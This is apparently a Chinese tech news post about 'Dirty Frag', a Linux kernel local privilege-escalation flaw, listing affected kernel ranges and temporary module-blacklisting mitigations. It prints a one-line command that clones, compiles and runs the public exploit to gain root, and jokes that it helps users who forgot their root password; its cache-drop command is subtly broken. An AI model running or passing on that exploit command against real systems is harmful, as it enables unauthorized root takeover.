继上个月的 Copy Fail (CVE-2026-31431) 之后,Linux 内核又爆出了一个提权漏洞:Dirty Frag。
这个漏洞由安全研究员 @v4bel 披露。Linux 内核又一严重本地提权漏洞,由于第三方违反规则公开了详情,于是 dirtyfrag 漏洞发现者也公开了,所以主流发行版目前暂无对应补丁。
它是怎么工作的?
POC 已在 GitHub 公开,任何人均可通过单行命令完成编译并执行。
git clone https://github.com/V4bel/dirtyfrag.git && cd dirtyfrag && gcc -O0 -Wall -o exp exp.c -lutil && ./exp
运行脚本,普通用户就能在几秒钟内变身超级管理员。
哪些系统受影响?
受影响范围非常广,基本涵盖了 2017 年至今(内核 4.14 及以上,甚至最新的 7.x)的大多数主流发行版。
几乎覆盖当前所有主流企业级和桌面 Linux 发行版。
-
xfrm-ESP:内核 commit cac2661c53f3(2017-01-17)起至最新主线(约 9 年影响范围)
-
RxRPC:内核 commit 2dc334f1a63a(2023-06)起至最新主线
如何临时封堵?
由于负责任披露时间表和保密协议已被打破,目前没有任何发行版存在补丁。请使用以下命令移除存在漏洞的模块并清除页面缓存。
sudo sh -c "printf 'install esp4 /bin/false\ninstall esp6 /bin/false\ninstall rxrpc /bin/false\n' > /etc/modprobe.d/dirtyfrag.conf"
sudo rmmod esp4 esp6 rxrpc 2>/dev/null ||true
一旦发行版更新了补丁,请及时更新。
清理受损缓存: 由于该漏洞会污染 Page Cache(页缓存),即便禁用了模块,如果之前已经被尝试攻击过,内存里的二进制文件可能还是坏的。建议执行:
sudo echo 3 > /proc/sys/vm/drop_caches
相关资源
-
PoC 与技术细节: GitHub - V4bel/dirtyfrag
-
安全预警: CloudLinux 漏洞通告
温馨提示:
- 安全研究请在受控实验环境下进行,切勿用于非法用途。
- 对于本就是root用户的个人服务器,这条新闻你就当没看到。
- 忘了 root 密码的用户有福了。